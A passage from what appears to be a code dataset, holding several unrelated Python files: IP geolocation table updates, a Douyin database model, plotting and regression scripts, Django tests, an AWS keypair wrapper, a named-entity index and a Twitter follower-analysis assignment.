dataset\n\"\"\"\ndef get_ip_list_dataInfo():\n ip_list = []\n with open(MANAGEMENT+'/datasheets/user_info.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[6] not in ip_list:\n ip_list.append(row[6])\n\n with open(MANAGEMENT+'/datasheets/finished_jobs.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n j_ip = row[20]\n if j_ip != 'NULL':\n if j_ip not in ip_list:\n ip_list.append(j_ip)\n\n return ip_list\n\n\n\"\"\"\n Get each latLon of user information from ip_latLon.csv dataset\n\"\"\"\ndef get_latLon_list_dataInfo():\n latLon_list = []\n with open(MANAGEMENT+'/datasheets/ipGeoDatabase/ip_latLon.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[1] not in latLon_list:\n latLon_list.append(row[1])\n return latLon_list\n\n\ndef update_tables():\n ip_list_dataInfo = get_ip_list_dataInfo()\n ip_list_database = get_ip_list_database()\n ip_loc_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/ip_loc.csv\", \"ab\"))\n latLon_loc_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/latLon_loc.csv\", \"ab\"))\n ip_latLon_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/ip_latLon.csv\", \"ab\"))\n latLon_list = []\n for ip_dataInfo in ip_list_dataInfo:\n if ip_dataInfo not in ip_list_database:\n ip_latLon_entry = [ip_dataInfo]\n ip_info = ipInfo(ip_dataInfo)\n ip_loc_entry = [ip_dataInfo]\n latLon_loc_entry = [ip_info.latLon]\n ip_loc_entry.append(ip_info.loc_entry)\n ip_latLon_entry.append(ip_info.latLon)\n latLon_loc_entry.append(ip_info.loc_entry)\n ip_loc_table.writerow(ip_loc_entry)\n ip_latLon_table.writerow(ip_latLon_entry)\n if latLon_loc_entry not in latLon_list:\n latLon_list.append(latLon_loc_entry)\n latLon_loc_table.writerow(latLon_loc_entry)\n\ndef update_latLon_loc():\n ip_list_database = get_ip_list_database()\n latLon_list_from_ip_loc = get_latLon_list_from_ip_loc()\n loc_list_database = get_loc_list_database()\n 
latLon_list_database = get_latLon_list_database()\n latLon_loc_table = csv.writer(open(MANAGEMENT+\"/datasheets/ipGeoDatabase/latLon_loc.csv\", \"ab\"))\n add_latLon_list = []\n for ip_database in ip_list_database:\n if ip_database != 'ip_address':\n ip_index = ip_list_database.index(ip_database) \n latLon = latLon_list_from_ip_loc[ip_index]\n loc_entry = loc_list_database[ip_index]\n\n if latLon not in latLon_list_database:\n if latLon != \"lat, lon\":\n if latLon not in add_latLon_list:\n add_latLon_list.append(latLon)\n latLon_loc_entry = [latLon]\n latLon_loc_entry.append(loc_entry)\n latLon_loc_table.writerow(latLon_loc_entry)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"management/ip_latLon_loc/update_ipGeoDatabase.py","file_name":"update_ipGeoDatabase.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"356019884","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom loach.model.base.basemodel import BaseModel\nfrom loach.model import douyindb\nfrom sqlalchemy import Column, Integer, String, DateTime\n\n\nclass DouYinLikeRelation(BaseModel):\n __tablename__ = 'tar_douyin_like_relation'\n __db__ = douyindb\n __key__ = 'user_id'\n __table_args__ = {\n \"schema\": \"douyindb_test\"\n }\n\n # 元数据\n id = Column(Integer, primary_key=True, autoincrement=True, comment=u'记录 id')\n create_time = Column(DateTime, nullable=False,\n default=datetime.datetime.now, comment=u'记录创建时间')\n # 基本数据,可通过 PC 端获取\n user_id = Column(String, nullable=False, default='', comment=u'作者 id')\n video_id = Column(String, nullable=False, default='', comment=u'')\n\n @classmethod\n def add(cls, user_id=None, **kwargs):\n obj = cls(user_id=user_id, **kwargs)\n with cls.__db__.session_context(autocommit=True) as session:\n session.add(obj)\n\n @classmethod\n def add_all(cls, objs):\n relations = [cls(**obj) for obj in objs]\n with cls.__db__.session_context(autocommit=True) as session:\n session.add_all(relations)\n\n @classmethod\n def exists(cls, user_id=None, video_id=None):\n with cls.__db__.session_context() as session:\n record = session.query(cls).filter(cls.user_id == user_id, cls.video_id == video_id).first()\n if record:\n return True\n else:\n return False\n\n @classmethod\n def upsert(cls, **kwargs):\n with cls.__db__.session_context(autocommit=True) as session:\n records = session.query(cls).with_for_update().filter(cls.user_id == kwargs['user_id'], cls.video_id == kwargs['video_id'])\n if records.first():\n rows_count = records.update({k: v for k, v in kwargs.items()})\n return rows_count\n else:\n session.add(cls(**kwargs))\n","sub_path":"loach/model/douyinlikerelation.py","file_name":"douyinlikerelation.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"9949151","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 15 22:50:16 2017\n\n@author: changchao\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nlabels = 'A', 'B', 'C', 'D'\n\nsizes = [20, 30, 40, 10]\n\nexplode = (0, 0, 0.1, 0)\n\nplt.pie(sizes, explode = explode, labels = labels, autopct = '%1.1f%%',\n shadow = True, startangle = 0)\n\nplt.show()\n","sub_path":"plt1.py","file_name":"plt1.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"283564998","text":"# Name - Dev Patel\r\n# Roll No - 18110113\r\n\r\nfrom operator 
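`update_ipGeoDatabase.py` above opens every CSV in binary mode (`'rb'` to read, `'ab'` to append) and never closes the writers — the Python 2 csv convention; under Python 3, `csv` requires text-mode handles opened with `newline=''` and raises `TypeError` on binary files. A py3-safe append helper (the path and row below are illustrative only):

```python
import csv

def append_rows(path, rows):
    """Append rows to a CSV, Python 3 style: text mode, newlines left to csv."""
    with open(path, 'a', newline='') as f:
        csv.writer(f).writerows(rows)

append_rows('datasheets/ipGeoDatabase/ip_loc.csv',
            [('1.2.3.4', 'Example City, EX')])  # hypothetical entry
```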
import eq\r\nimport numpy as np\r\nfrom sympy import *\r\n\r\n\r\nlinks = int(input(\"Enter no of links: \")) # User input to get no of links\r\n\r\n\r\nQ_ddot = [sympify(\"q{}_ddot\".format(j)) for j in range(links)] # Define q\" - (from q\"(0) to q\"(n-1))\r\nQ_dot = [sympify(\"q{}_dot\".format(j)) for j in range(links)] # Define q' - (from q'(0) to q'(n-1))\r\nQ = [sympify(\"q{}\".format(j)) for j in range(links)] # Define q - joint angles (from q(0) to q(n-1))\r\n\r\nV = sympify(input(\"enter V: \")) # Get expression of potential in terms of joint angles form user\r\n\r\n# Get the D(q) matrix from the user in terms of q\r\nD = eye(links)\r\nfor i in range(links):\r\n for j in range(links):\r\n D[i,j] = sympify(input(\"enter element d({},{}): \".format(i,j)))\r\n\r\n\r\n# Forming the equations of motion \r\n\r\nfor k in range(links):\r\n a=0\r\n b=0\r\n for j in range(links):\r\n a += D[k,j]*Q_ddot[j]\r\n for i in range(links):\r\n for j in range(links):\r\n b += (diff(D[k,j],Q[i]) - 0.5*diff(D[i,j],Q[k])) * Q_dot[i]*Q_dot[j]\r\n c = diff(V,Q[k])\r\n T = sympify(\"T({})\".format(k)) # define the torques applied on the links\r\n\r\n lhs = sympify(a+b-c)\r\n rhs = T\r\n\r\n print(\"{} = {}\".format(lhs,rhs)) # print the equations","sub_path":"T11.py","file_name":"T11.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"331519614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDescription: Test cases for finance models.\n\"\"\"\n__author__ = \"Ariel Gerardo Rios (ariel.gerardo.rios@gmail.com)\"\n\n\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom django.test import TestCase\n\nfrom .models import Purchase, PurchaseItem, PurchaseCost, Sell, SellItem, SellCost\nfrom book.models import Book\n\n\nclass PurchaseTestCase(TestCase):\n def setUp(self):\n self._purchase = Purchase.objects.create(\n date=datetime.now().date(),\n price=Decimal('100.00'),\n )\n\n book = Book.objects.create(\n title='test title',\n )\n\n for i in range(10):\n PurchaseItem.objects.create(\n purchase=self._purchase,\n book=book,\n quantity=1,\n price=Decimal('1.00')\n )\n\n PurchaseCost.objects.create(\n purchase=self._purchase,\n date=datetime.now(),\n price=Decimal('1.00'),\n )\n\n def test_get_total_units(self):\n self.assertEquals(10, self._purchase.get_total_units())\n\n def test_get_total_cost(self):\n self.assertEquals(Decimal('10.00'), self._purchase.get_total_cost())\n\n def test_get_full_price(self):\n self.assertEquals(Decimal('110.00'), self._purchase.get_full_price())\n\n def test_get_total_price_with_price(self):\n self.assertEquals(Decimal('100.00'), self._purchase.get_total_price())\n\n def test_get_total_price_without_price(self):\n self._purchase.price = Decimal('0')\n self._purchase.save()\n self.assertEquals(Decimal('10.00'), self._purchase.get_total_price())\n\n\nclass SellTestCase(TestCase):\n def setUp(self):\n self._sell = Sell.objects.create(\n date=datetime.now().date(),\n price=Decimal('100.00'),\n )\n\n book = Book.objects.create(\n title='test title',\n )\n\n for i in range(10):\n SellItem.objects.create(\n sell=self._sell,\n book=book,\n quantity=1,\n price=Decimal('1.00')\n )\n\n SellCost.objects.create(\n sell=self._sell,\n date=datetime.now(),\n price=Decimal('1.00'),\n )\n\n def test_get_total_units(self):\n self.assertEquals(10, self._sell.get_total_units())\n\n def test_get_total_cost(self):\n self.assertEquals(Decimal('10.00'), 
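T11.py above assembles the manipulator equations as `lhs = a + b - c` with `c = diff(V, Q[k])`; for a Lagrangian L = K − V the potential term enters with a plus sign (τ_k = Σ_j d_kj q̈_j + Σ_ij c_ijk q̇_i q̇_j + ∂V/∂q_k), so the minus looks wrong unless the user is expected to enter −V. A one-link pendulum check makes the sign visible (D is constant here, so the Christoffel term b vanishes):

```python
from sympy import symbols, diff, cos

q, q_ddot, m, g, l = symbols('q q_ddot m g l')

d00 = m * l**2            # inertia of a point mass on a massless rod
V = -m * g * l * cos(q)   # potential energy, q measured from the downward vertical

lhs = d00 * q_ddot + diff(V, q)  # note the +: gravity restores the pendulum
print(lhs)                       # m*l**2*q_ddot + m*g*l*sin(q) = T, as expected
```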
self._sell.get_total_cost())\n\n    def test_get_net_price(self):\n        self.assertEquals(Decimal('90.00'), self._sell.get_net_price())\n\n    def test_get_total_price_with_price(self):\n        self.assertEquals(Decimal('100.00'), self._sell.get_total_price())\n\n    def test_get_total_price_without_price(self):\n        self._sell.price = Decimal('0')\n        self._sell.save()\n        self.assertEquals(Decimal('10.00'), self._sell.get_total_price())\n","sub_path":"l4capitulos/finance/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"239416639","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 14 19:33:01 2018\n\n@author: Winry\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 13 18:36:20 2018\n\n@author: Winry\n\"\"\"\n\nimport numpy as np\nimport numpy.matlib  # needed so that np.matlib.rand below resolves\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import BayesianRidge, LinearRegression, ElasticNet\nfrom sklearn.svm import SVR\nfrom sklearn.ensemble.gradient_boosting import GradientBoostingRegressor # ensemble algorithm\nfrom sklearn.model_selection import cross_val_score # cross-validation\nfrom sklearn.metrics import explained_variance_score, mean_absolute_error, mean_squared_error, r2_score # import the metric functions in one batch\nimport pandas as pd \nimport matplotlib.pyplot as plt\n\n\n#df_train = pd.read_csv('train.csv')\n#df_test = pd.read_csv('test.csv')\n#\n#df_train = df_train.dropna(axis=0)\n#df_test = df_test.dropna(axis=0)\n#\n#X_train = df_train.iloc[:,0:6]\n#y_train = df_train.iloc[:,-2]\n#X_train['ytrain'] =y_train\n#X_train = X_train.dropna(axis=0)\n#y_train = X_train['ytrain']\n#X_train = X_train.iloc[:,0:10]\n#\n#X_test = df_test.iloc[0:150,1:11]\n#y_test = df_test.iloc[0:150,-1]\n#\n#X_test = X_test.dropna(axis=0)\n#y_test = y_test.dropna(axis=0)\n\n#X_train = preprocessing.scale(X_train)\n##y_train = preprocessing.scale(y_train)\n#X_test = preprocessing.scale(X_test)\n#y_test = preprocessing.scale(y_test)\n\n# data preparation\ndf = pd.read_csv('d11_13.csv')\ndf = df.iloc[:,0:10]\ndf = df.dropna(axis=0)\n\nX = df.iloc[:,0:7]\ny = df['forecast']\n\nlabel_train = []\nlabel_test = []\n#X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=15)\nfor i in range(len(X)):\n    temp = np.matlib.rand(1)\n    if temp >= 0.8:\n        label_test.append(i)\n    else:\n        label_train.append(i)\nX_train = X.iloc[label_train,:]\ny_train = y.iloc[label_train]\n\n\ndf_train = pd.read_csv('train.csv')\nX_train =df_train.dropna(axis=0).iloc[:,0:7]\ny_train = df_train.dropna(axis=0).iloc[:,-2]\n\n\ndf_test = pd.read_csv('test.csv')\n\n\ndf_test = df_test.dropna(axis=0)\nX_test = df_test.iloc[:,0:7]\ny_test = df_test.iloc[:,-2]\n\n\n\n\n\n# train the regression models\nn_folds = 6 # number of cross-validation folds\nmodel_br = BayesianRidge() \nmodel_lr = LinearRegression() \nmodel_etc = ElasticNet() \nmodel_svr = SVR() \nmodel_gbr = GradientBoostingRegressor() \nmodel_names = ['BayesianRidge', 'LinearRegression', 'ElasticNet', 'SVR', 'GBR'] \nmodel_dic = [model_br, model_lr, model_etc, model_svr, model_gbr] \ncv_score_list = [] # list of cross-validation results\npre_y_list = [] # list of y values predicted by each regression model\nfor model in model_dic: # iterate over the regression model objects\n    scores = cross_val_score(model, X_train, y_train, cv=n_folds) # run cross-validation for each regression model\n    cv_score_list.append(scores) # store the cross-validation scores\n    pre_y_list.append(model.fit(X_train, y_train).predict(X_train)) # store each fitted model's predictions on the training set\n# evaluate the models with regression metrics\nn_samples, n_features = X_train.shape # total number of samples and features\nmodel_metrics_name = [explained_variance_score, mean_absolute_error, mean_squared_error, r2_score] # set of regression metric functions\nmodel_metrics_list = [] # 
list of regression metric results\nfor i in range(5): # loop over each model index\n    tmp_list = [] # temporary result list for this inner loop\n    for m in model_metrics_name: # loop over each metric function\n        tmp_score = m(y_train, pre_y_list[i]) # compute each regression metric\n        tmp_list.append(tmp_score) # store the result in the temporary list\n    model_metrics_list.append(tmp_list) # store the results in the metrics list\ndf1 = pd.DataFrame(cv_score_list, index=model_names) # build the cross-validation dataframe\ndf2 = pd.DataFrame(model_metrics_list, index=model_names, columns=['ev', 'mae', 'mse', 'r2']) # build the regression-metric dataframe\nprint ('samples: %d \\t features: %d' % (n_samples, n_features)) # print the number of samples and features\nprint (70 * '-')\nprint ('cross validation result:') # print the section title\nprint (df1) # print the cross-validation dataframe\nprint (70 * '-') \nprint ('regression metrics:') # print the section title\nprint (df2) # print the regression-metric dataframe\nprint (70 * '-')\nprint ('short name \\t full name') # print the abbreviation/full-name header\nprint ('ev \\t explained_variance')\nprint ('mae \\t mean_absolute_error')\nprint ('mse \\t mean_squared_error')\nprint ('r2 \\t r2')\nprint (70 * '-') # print a separator line\n# visualize the model results\nplt.figure() # create the canvas\nplt.plot(np.arange(X_train.shape[0]), y_train, color='k', label='true y') # plot the curve of the true values\ncolor_list = ['r', 'b', 'g', 'y', 'c']\nlinestyle_list = ['-', '.', 'o', 'v', '*']\nfor i, pre_y in enumerate(pre_y_list): # read out each model's predictions and their indices\n    plt.plot(np.arange(X_train.shape[0]), pre_y_list[i], color_list[i], label=model_names[i]) # plot each prediction curve\nplt.title('regression result comparison')\nplt.legend(loc='upper right')\nplt.ylabel('real and predicted value') # y-axis label\nplt.show() # show the figure\nprint ('regression prediction')\ncc = []\n\nfor i in range(len(X_test)):\n    new_point = X_test.iloc[i,:]\n    new_point = new_point.values\n    new_point = np.array(new_point).reshape(1,-1)\n    new_pre_y = model_gbr.predict(new_point)\n    cc.append(list(np.around(new_pre_y)))\ngbr_count = 0\nfor i in range(len(y_test)):\n    if (cc[i][0] <= y_test.iloc[i]+2)&(cc[i][0] >= y_test.iloc[i]-2):\n#    if (cc[i][0] == y_test.iloc[i]):\n        gbr_count += 1\nk11=[]\nfor i in range(len(cc)):\n    k11.append(cc[i][0])\n\n    \n\n","sub_path":"浦东滑行预测代码/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"399087759","text":"import turtle as t\nimport random as rnd\nimport math\n\nDEGS_IN_CIRC = 360\nINCR_DEGS = 12\nBOTTOM_EDGE = 200\nOUTER_EDGE = 50\nBOTTOM_TIP_ANGLE = 60\nTOP_TIP_ANGLE = 130\nTOP_EDGE = 230\nBG_COLOR = (0.8, 0.95, 0.9)\n\nscreen = t.getscreen()\nscreen.bgcolor(BG_COLOR)\nwidth = screen.window_width()\nheight = screen.window_height()\nt.shape(\"turtle\")\nt.delay(0)\nt.speed(\"fastest\")\n# t.exitonclick()\n\nwhile True:\n    w = rnd.randint(0, width-1)\n    h = rnd.randint(0, height-1)\n    t.pu()\n    t.goto(w - width/2, h - height/2)\n    t.pd()\n\n    stroke_color = 'green'\n    for angle in range(0, DEGS_IN_CIRC, INCR_DEGS):\n        t.setheading(angle)\n        fill_color = (math.cos(math.radians(angle)) + 1)/2\n        t.fillcolor(fill_color, fill_color, fill_color)\n        t.begin_fill()\n        t.pencolor(stroke_color)\n        t.forward(BOTTOM_EDGE)\n        t.left(BOTTOM_TIP_ANGLE)\n        t.forward(OUTER_EDGE)\n        t.left(TOP_TIP_ANGLE)\n        t.forward(TOP_EDGE)\n        t.end_fill()\n","sub_path":"week06/01_radial_design_nofuncts.py","file_name":"01_radial_design_nofuncts.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"197789672","text":"'''\nAuthor: Puffrora\nDate: 2020-10-14 22:13:36\nLastModifiedBy: Puffrora\nLastEditTime: 2020-10-14 22:30:49\n'''\n\n\n\"\"\"\nHierholzer's algorithm finds an Eulerian circuit in an Eulerian graph.\n\nStarting from node u, traverse not-yet-used edges arbitrarily until we get \"stuck\". At that point we are necessarily back at node u, because every node's in-degree equals its out-degree.\nBack at node u, we now have a circuit that starts and ends at u; some nodes on this circuit may still have unused outgoing edges.\nStarting again from such a node v, we obtain another circuit from v back to v and splice it into the previous one, i.e.\nu→⋯→v→⋯→u\nbecomes\nu→⋯→v→⋯→v→⋯→u\nRepeat until no node has an unused outgoing edge; we have then found an Eulerian circuit.\n\"\"\"\nclass Solution:\n    def crackSafe(self, n, k):\n        seen = set()\n        res = []\n        threshold = 10 ** (n - 1)\n\n        # each node should be an (n-1)-digit number; e.g. for n=3, k=5 one node could be 24\n        def dfs(node):\n            for x in range(k):\n                # if x=3 the next node is 243\n                next_node = 10 * node + x\n                if next_node not in seen:\n                    seen.add(next_node)\n                    # take the remainder to get 43, then keep searching from node 43\n                    dfs(next_node % threshold)\n                    res.append(str(x))\n\n        dfs(0)\n        \n        # return to the start; the start node is 0, so append \"0\" * (n - 1)\n        return \"\".join(res) + \"0\" * (n - 1)\n\n","sub_path":"Leetcode/leetcode753 破解保险箱.py","file_name":"leetcode753 破解保险箱.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"551291770","text":"'''\nCreated on 19-Mar-2014\n\n@author: annamalai\n'''\nfrom connection import AWS\n\nclass StructKeypairs():\n    def __init__(self, id, region, fingerprint):\n        self.region = region\n        self.id = id\n        self.fingerprint = fingerprint\n\nclass KeyPairs(AWS):\n    \n    def get_key_pairs(self):\n        keypair_list = []\n        if self.client:\n            keypairs= self.client.get_all_key_pairs()\n            for keypair in keypairs:\n                keypair_list.append(StructKeypairs(keypair.name,keypair.region.name,keypair.fingerprint))\n        else:\n            raise Exception(\"Unable to connect \" + self.awscloud)\n        return keypair_list\n    \n    def create_keypairs(self, name):\n        if self.client:\n            key_pair = self.client.create_key_pair(name)\n        else:\n            raise Exception(\"Unable to connect \" + self.awscloud)\n        return key_pair\n    \n    def keypair_download(self,name):\n        keypair = []\n        if self.client:\n            keypair = self.client.get_all_key_pairs(keynames = str(name))\n        else:\n            raise Exception(\"Unable to connect \" + self.awscloud)\n        return keypair\n\n    def delete_keypair(self,name):\n        if self.client:\n            key_pair = self.client.delete_key_pair(key_name = name)\n        else:\n            raise Exception(\"Unable to connect \" + self.awscloud)\n        return key_pair\n","sub_path":"aws_api/keypairs.py","file_name":"keypairs.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"633914197","text":"__author__ = 'dowling'\n\nfrom backend.core.util.util import *\nln = getModuleLogger(__name__)\n\nfrom collections import defaultdict\n\nimport ast\n\nclass NamedEntityIndex(object):\n    def __init__(self):\n        \"\"\"\n        creates an inverted index:\n        {named_entity -> [(document_id, frequency)]}\n        \"\"\"\n        self.index = defaultdict(list)\n        try:\n            self.load()\n        except:\n            ln.debug(\"Couldn't load index from file.\")\n\n    def addDocument(self, document):\n        counts = self.countEntities(document.vectors[\"named_entities\"])\n        for namedEntity, count in counts.items():\n            self.index[namedEntity].append((document._id, count))\n\n    def countEntities(self, entities):\n        entityCounts = defaultdict(int)\n        for idx, (entityType, entity) in enumerate(entities):\n            # first, update the raw count of this entity\n            entityCounts[entity] += 1\n\n            # next, see if this entity might be equivalent to any of the previous entities\n            for otherEntityType, otherEntity in entities[:idx]:\n                parts = otherEntity.split(\" \")\n                # if the entity is a true subset of another entity, increment the frequency for the other one as well\n                # This lets us better resolve situations where a person is mentioned (Firstname, Lastname),\n                # but subsequently only mentioned by last name.\n                # This also 
helps with organizations (Apple vs. Apple Computers).\n if len(parts) != 1 and entity in parts:\n entityCounts[otherEntity] += 1\n\n return entityCounts\n\n def query(self, namedEntity):\n return self.index[namedEntity]\n\n def save(self):\n with open(\"./persist/NERIndex.idx\", \"w\") as f:\n f.write(str(dict(self.index)))\n\n def load(self):\n with open(\"./persist/NERIndex.idx\", \"r\") as f:\n index = ast.literal_eval(f.read())\n self.index = defaultdict(list)\n for entry in index:\n self.index[entry] = index[entry]\n\n\n\n","sub_path":"backend/link/NamedEntityIndex.py","file_name":"NamedEntityIndex.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"357106188","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 4 15:17:35 2020\n\n@author: miame\n\"\"\"\n\"\"\"\nAssignment:\n\nFor the purposes of this exercise, we define three types of Twitter users.\n- Layman: Users with less than 100 followers\n- Expert: Users with 100-1000 followers\n- Celebrity: Users with more than 1000 followers\n\nUsing the Twitter API, and starting with the @WUSTLPoliSci twitter user, answer\nthe following:\n-One degree of separation:\n –Among the followers of @WUSTLPoliSci who is the most active?\n –Among the followers of @WUSTLPoliSci who is the most popular, i.e. has\n the greatest number of followers?\n –Among the friends of @WUSTLPoliSci, i.e. the users she is following, who\n are the most active layman, expert and celebrity?\n –Among the friends of @WUSTLPoliSci who is the most popular?\n\n-Two degrees of separation: For the following two questions, limit your search\nof followers and friends to laymen and experts.\n –Among the followers of @WUSTLPoliSci and their followers, who is the\n most active?\n –Among the friends of @WUSTLPoliSci and their friends, who is the most active?\n\nFor reference, current tweepy documentation:\n http://docs.tweepy.org/en/v3.9.0/api.html\nLatest tweepy documentation:\n http://docs.tweepy.org/en/latest/api.html\n\"\"\"\nimport importlib # to import file\nimport sys # add directory to system PATH\nimport time\nimport tweepy\n\nstart_twitter_handle = 'WUSTLPoliSci'\n#start_twitter_handle = 'liang111590'\nbatch_size = 100 #max allowed by tweepy\nsleep_time = 5\nlaymen_follower_count = 100\nexpert_follower_count = 1000\ncelebrity_follower_count = 1001\n\nsys.path.insert(0, 'C:/Users/miame/Documents/Secrets')\ntwitter = importlib.import_module('start_twitter')\napi = twitter.client\n\nstart = time.time()\n\n# =============================================================================\n# variables we want from first degree of separation\n# =============================================================================\n\nmost_active_follower_WUSTL = {}\nmost_popular_follower_WUSTL = {}\n\nmost_active_friend_WUSTL_laymen = {}\nmost_active_friend_WUSTL_expert = {}\nmost_active_friend_WUSTL_celebrity = {}\nmost_popular_friend_WUSTL = {}\n\n# =============================================================================\n# additional variables from the second degree of separation\n# =============================================================================\n\nmost_active_follower = {}\nmost_active_friend = {}\n\n# =============================================================================\n# function to batch out users from provided list\n# from: https://stackoverflow.com/questions/8290397/how-to-split-an-iterable-in-constant-size-chunks\n# 
=============================================================================\n\ndef batch(iterable, n=batch_size):\n l = len(iterable)\n for ndx in range(0, l, n):\n yield iterable[ndx:min(ndx + n, l)]\n\n# =============================================================================\n# function to determine most active follower, most popular follower,\n# and a dictionary of followers\n# =============================================================================\n\ndef get_followers(handles_list):\n global number_requests\n #creating a dictionary for the followers\n follower_dict = {}\n\n #empty dictionaries to keep the most active and most popular\n most_active_laymen = {'screen_name' : 0} #default dict key/value\n most_active_expert = {'screen_name' : 0}\n most_active_celebrity = {'screen_name' : 0}\n most_popular = {'screen_name' : 0}\n\n for user in handles_list:\n loop_count = 0\n current_time = time.time()\n print(\"User handle: \" + user + \". Elapsed time: \" + str(round((current_time - start), 2)))\n try:\n user_follower_ids = api.followers_ids(user)\n number_requests += 1\n print(\"Got follower ids! (request count: \" + str(number_requests) + \").\")\n\n for batch_list in batch(user_follower_ids):\n time.sleep(sleep_time) #to avoid rate limit\n \n try:\n followers = api.lookup_users(batch_list)\n number_requests += 1\n print(\"Batch #\" + str(loop_count) + \": \" + str(loop_count*batch_size + len(batch_list)) +\n \" (request count: \" + str(number_requests) + \").\")\n loop_count+=1\n\n for follower in followers:\n screen_name = follower.screen_name\n tweet_count = follower.statuses_count\n followers_count = follower.followers_count\n \n # finding most active friend by category\n if followers_count <= laymen_follower_count:\n if tweet_count > list(most_active_laymen.values())[0]:\n most_active_laymen = {screen_name : tweet_count}\n elif followers_count >= celebrity_follower_count:\n if tweet_count > list(most_active_celebrity.values())[0]:\n most_active_celebrity = {screen_name : tweet_count}\n else: #aka an expert\n if tweet_count > list(most_active_expert.values())[0]:\n most_active_expert = {screen_name : tweet_count}\n \n if followers_count > list(most_popular.values())[0]:\n most_popular = {screen_name : followers_count}\n \n #updating the dictionary;\n #ONLY SAVING LAYMEN AND EXPERTS (per assignment)\n #values are tuple with tweet count first, follower count second\n if followers_count < celebrity_follower_count:\n follower_dict.update({screen_name : (tweet_count, followers_count)})\n\n except tweepy.TweepError as e:\n print(\"API call to lookup users for follower id failed: \" + str(e.reason) + \" Skipping this batch.\")\n\n except tweepy.TweepError as e:\n print(\"API call to get follower ids failed: \" + str(e.reason) + \" Skipping this user.\")\n\n\n return (follower_dict, most_active_laymen, most_active_expert,\n most_active_celebrity, most_popular) #returning tuple\n\n# =============================================================================\n# function to determine most active friends by category, most popular friend,\n# and a dictionary of friends (friends are accounts you follow)\n# =============================================================================\n\ndef get_friends(handles_list):\n global number_requests\n #creating a dictionary for the followers\n friends_dict = {}\n\n #empty dictionaries to keep the most active and most popular\n most_active_laymen = {'screen_name' : 0} #default dict key/value\n most_active_expert = {'screen_name' : 0}\n 
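The batch() generator above chunks follower-id lists so that each lookup_users call stays within tweepy's 100-user-per-request cap. A minimal standalone sketch of the same chunking idea follows; the names chunks and ids are illustrative and not part of the original script.
def chunks(seq, size=100):
    # yield successive slices of at most `size` items
    for start in range(0, len(seq), size):
        yield seq[start:start + size]

if __name__ == "__main__":
    ids = list(range(250))
    assert [len(c) for c in chunks(ids)] == [100, 100, 50]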
most_active_celebrity = {'screen_name' : 0}\n most_popular = {'screen_name' : 0}\n\n for user in handles_list:\n loop_count = 0\n current_time = time.time()\n print(\"User handle: \" + user + \". Elapsed time: \" + str(round((current_time - start), 2)))\n try:\n user_friends_ids = api.friends_ids(user)\n number_requests += 1\n print(\"Got friend ids! (request count: \" + str(number_requests) + \").\")\n\n for batch_list in batch(user_friends_ids):\n time.sleep(sleep_time) #to avoid rate limit\n \n try:\n friends = api.lookup_users(batch_list)\n number_requests += 1\n print(\"Batch #\" + str(loop_count) + \": \" + str(loop_count*batch_size + len(batch_list)) +\n \" (request count: \" + str(number_requests) + \").\")\n loop_count+=1\n\n for friend in friends:\n screen_name = friend.screen_name\n tweet_count = friend.statuses_count\n followers_count = friend.followers_count\n \n # finding most active friend by category\n if followers_count <= laymen_follower_count:\n if tweet_count > list(most_active_laymen.values())[0]:\n most_active_laymen = {screen_name : tweet_count}\n elif followers_count >= celebrity_follower_count:\n if tweet_count > list(most_active_celebrity.values())[0]:\n most_active_celebrity = {screen_name : tweet_count}\n else: #aka an expert\n if tweet_count > list(most_active_expert.values())[0]:\n most_active_expert = {screen_name : tweet_count}\n # finding most popular friend\n if followers_count > list(most_popular.values())[0]:\n most_popular = {screen_name : followers_count}\n \n #updating the dictionary;\n #ONLY SAVING LAYMEN AND EXPERTS (per assignment)\n #values are tuple with tweet count first, follower count second\n if followers_count < celebrity_follower_count:\n friends_dict.update({screen_name : (tweet_count, followers_count)})\n\n except tweepy.TweepError as e:\n print(\"API call to lookup users for friend id failed: \" + str(e.reason) + \" Skipping this batch.\")\n\n except tweepy.TweepError as e:\n print(\"API call to get friend ids failed: \" + str(e.reason)+ \" Skipping this user.\")\n\n return 